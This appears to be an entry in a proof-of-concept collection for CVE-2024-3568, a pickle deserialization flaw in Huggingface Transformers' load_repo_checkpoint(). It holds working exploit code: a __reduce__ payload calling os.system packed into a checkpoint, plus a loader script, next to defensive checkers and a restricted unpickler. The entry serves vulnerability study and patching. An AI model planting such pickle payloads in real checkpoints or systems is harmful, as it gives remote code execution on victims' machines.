Awesome-POC/人工智能漏洞/Huggingface Transformers Checkpoint 反序列化漏洞 CVE-2024-3568.md
2025-03-10 16:59:16 +08:00

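# Huggingface Transformers Checkpoint Deserialization Vulnerability CVE-2024-3568
## Vulnerability Description
CVE-2024-3568 is a deserialization vulnerability in Huggingface's Transformers library. The `load_repo_checkpoint()` function of the `TFPreTrainedModel()` class uses the unsafe `pickle.load()` method to deserialize untrusted data. An attacker can craft a malicious serialized payload and trick a victim into loading a seemingly harmless checkpoint during a normal training run, which executes arbitrary code on the target machine and results in remote code execution.
Exploitation may take the form of supply chain poisoning: the attacker plants maliciously crafted data in the model data so that the deserialization step triggers code execution. The attack is dangerous because the victim unknowingly loads a tampered model checkpoint, which lets the attacker execute arbitrary code on the victim's system.
References: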
- https://github.com/advisories/GHSA-37q5-v5qm-c9v8
- https://github.com/huggingface/transformers/commit/693667b8ac8138b83f8adb6522ddaf42fa07c125
- https://huntr.com/bounties/b3c36992-5264-4d7f-9906-a996efafba8f
## Disclosure Date
```
2024.02.03
```
## Affected Versions
```
transformers < 4.38.0
```
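The affected range above can be checked against the locally installed package. The following is a minimal sketch, not an official tool: the names `PATCHED`, `is_affected`, and `installed_transformers_is_affected` are hypothetical, and the version parsing is deliberately simplified (it reads only the leading `X.Y.Z` digits, so a pre-release such as `4.38.0.dev0` is treated like `4.38.0`).

```python
import re
from importlib import metadata

# First release outside the affected range "transformers < 4.38.0"
PATCHED = (4, 38, 0)


def is_affected(version: str) -> bool:
    """Return True if the given version string falls below 4.38.0.

    Simplified parsing: only the leading numeric X.Y[.Z] part is compared.
    """
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)
    if m is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    parsed = tuple(int(g or 0) for g in m.groups())
    return parsed < PATCHED


def installed_transformers_is_affected():
    """Check the installed transformers package; None if it is not installed."""
    try:
        return is_affected(metadata.version("transformers"))
    except metadata.PackageNotFoundError:
        return None


if __name__ == "__main__":
    print("affected:", installed_transformers_is_affected())
```

With the environment described in this document (`transformers==4.37.2`), the check is expected to report the package as affected.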
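## Environment Setup
Create a virtual environment with Python 3.9. The pinned versions of `tensorflow`, `transformers`, and `keras` must be installed; other versions may raise compatibility errors: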
```shell
# Create the working directory
mkdir CVE-2024-3568 && cd CVE-2024-3568
# Create a new venv with Python 3.9
python3.9 -m venv venv
source venv/bin/activate
# Install compatible versions of TensorFlow, Transformers, and Keras
pip install --upgrade pip
pip install tensorflow==2.15 transformers==4.37.2 keras==2.15
```
Log in to Huggingface to obtain an access token, then log in with `huggingface-cli`:
```
> huggingface-cli login
Enter your token (input will not be visible): xxxxxxxxx
```
Directory structure:
```
CVE-2024-3568
├── awesome_poc
│   └── checkpoint
│       ├── extra_data.pickle
│       └── weights.h5
├── generate_payload.py
├── poc.py
└── venv
```
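Use `generate_payload.py` to generate `extra_data.pickle` and `weights.h5`:
- `extra_data.pickle`: the serialized metadata file. The model loads this file with `pickle.load()` when it loads the checkpoint.
- `weights.h5`: the model weights file. It must match the model architecture; otherwise an exception is raised.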
```python
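import os
import pickle
from transformers import TFAutoModel
class CExecute:
    def __reduce__(self):
        # On load, pickle calls the returned callable with the returned arguments
        cmd = 'open /System/Applications/Calculator.app'
        return (os.system, (cmd,))
# load_repo_checkpoint() expects both files under <repo>/checkpoint/
checkpoint_dir = os.path.join('awesome_poc', 'checkpoint')
os.makedirs(checkpoint_dir, exist_ok=True)
# Generate extra_data.pickle
poc = CExecute()
with open(os.path.join(checkpoint_dir, 'extra_data.pickle'), 'wb') as fp:
    pickle.dump(poc, fp)
# Generate weights.h5
model = TFAutoModel.from_pretrained('google-bert/bert-base-uncased')
model.save_weights(os.path.join(checkpoint_dir, 'weights.h5'))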
```
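A pickle file can be inspected without being executed, which is useful for confirming what a checkpoint's `extra_data.pickle` would import when loaded. The sketch below uses the standard-library `pickletools.genops()` to walk the opcode stream; the helper name `find_globals` is hypothetical, and the handling of `STACK_GLOBAL` is a heuristic (it assumes the module and attribute names are the two most recent string arguments, which holds for simple payloads but not for every pickle).

```python
import pickle
import pickletools


def find_globals(data: bytes):
    """List the 'module.name' objects a pickle would import, without loading it.

    Heuristic: for STACK_GLOBAL, the two most recently seen string arguments
    are taken as the module and attribute names.
    """
    strings = []
    hits = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            # Protocols 0-3: the argument is "module name" separated by a space
            module, name = arg.split(" ", 1)
            hits.append(f"{module}.{name}")
        elif opcode.name == "STACK_GLOBAL":
            # Protocol 4+: names were pushed on the stack as strings beforehand
            hits.append(".".join(strings[-2:]))
        elif isinstance(arg, str):
            strings.append(arg)
    return hits


if __name__ == "__main__":
    # Harmless self-test: a pickled reference to the builtin len()
    print(find_globals(pickle.dumps(len, protocol=4)))
```

Running `find_globals()` on the bytes of `awesome_poc/checkpoint/extra_data.pickle` should reveal a reference to the system-command function (typically reported under the `posix` module on macOS and Linux), which has no place in legitimate checkpoint metadata.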
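## Vulnerability Reproduction
When the object is serialized, `pickle` calls its `__reduce__` method and records the returned callable and arguments. When the file is deserialized, `pickle.load()` invokes that callable, which executes the command we wrote: `open /System/Applications/Calculator.app`.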
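The `__reduce__` mechanism can be observed safely with a harmless callable. The following is a minimal sketch in which the builtin `int` stands in for `os.system`; the class name `Demo` is hypothetical. It shows that the callable recorded at dump time runs at load time, and that the loaded value is whatever that callable returns rather than an instance of the original class.

```python
import pickle


class Demo:
    def __reduce__(self):
        # Harmless stand-in for (os.system, (cmd,)): ask pickle to call int("1337")
        return (int, ("1337",))


blob = pickle.dumps(Demo())   # __reduce__ is consulted here, at dump time
result = pickle.loads(blob)   # int("1337") is invoked here, at load time

# The loaded object is the callable's return value, not a Demo instance
print(type(result).__name__, result)
```

Replacing `int` with `os.system` is all it takes to turn the same structure into the payload used in `generate_payload.py`.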
Use `poc.py` to simulate model training and load the `checkpoint` that carries the malicious command:
```python
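from transformers import TFAutoModel
from tensorflow.keras.optimizers import Adam
# Load the same architecture that weights.h5 was saved from
model = TFAutoModel.from_pretrained('bert-base-uncased')
# The model must be compiled so that an optimizer is attached before the checkpoint is loaded
model.compile(optimizer=Adam(learning_rate=5e-5), loss='sparse_categorical_crossentropy', metrics=['accuracy'])
# Reads awesome_poc/checkpoint/weights.h5, then unpickles awesome_poc/checkpoint/extra_data.pickle
model.load_repo_checkpoint('awesome_poc')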
```
![](images/Huggingface%20Transformers%20Checkpoint%20反序列化漏洞%20CVE-2024-3568/image-20250304154148096.png)
## Remediation
- Upgrade transformers to the latest version (4.38.0 or later, per the affected range above): https://github.com/huggingface/transformers
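
Where upgrading is not immediately possible and pickled metadata from an untrusted source must still be read, one general hardening pattern is to restrict what the unpickler may import, as described in the Python `pickle` documentation. The sketch below is an illustration under that assumption and is not the fix applied in transformers; the names `NoGlobalsUnpickler` and `safe_loads` are hypothetical. It rejects every global lookup, so it accepts only plain builtin containers and scalars and would refuse real checkpoint metadata that contains other object types.

```python
import io
import pickle


class NoGlobalsUnpickler(pickle.Unpickler):
    """Unpickler that refuses to import anything (hypothetical helper)."""

    def find_class(self, module, name):
        # Called for every GLOBAL / STACK_GLOBAL opcode; block them all
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def safe_loads(data: bytes):
    """Load a pickle made only of builtin containers and scalars."""
    return NoGlobalsUnpickler(io.BytesIO(data)).load()


if __name__ == "__main__":
    print(safe_loads(pickle.dumps({"epoch": 3})))  # plain data loads normally
    try:
        safe_loads(pickle.dumps(len))              # any import is rejected
    except pickle.UnpicklingError as exc:
        print("blocked:", exc)
```

Because a `__reduce__` payload needs a global lookup to reach its callable, a payload like the one in `generate_payload.py` is rejected before the command can run.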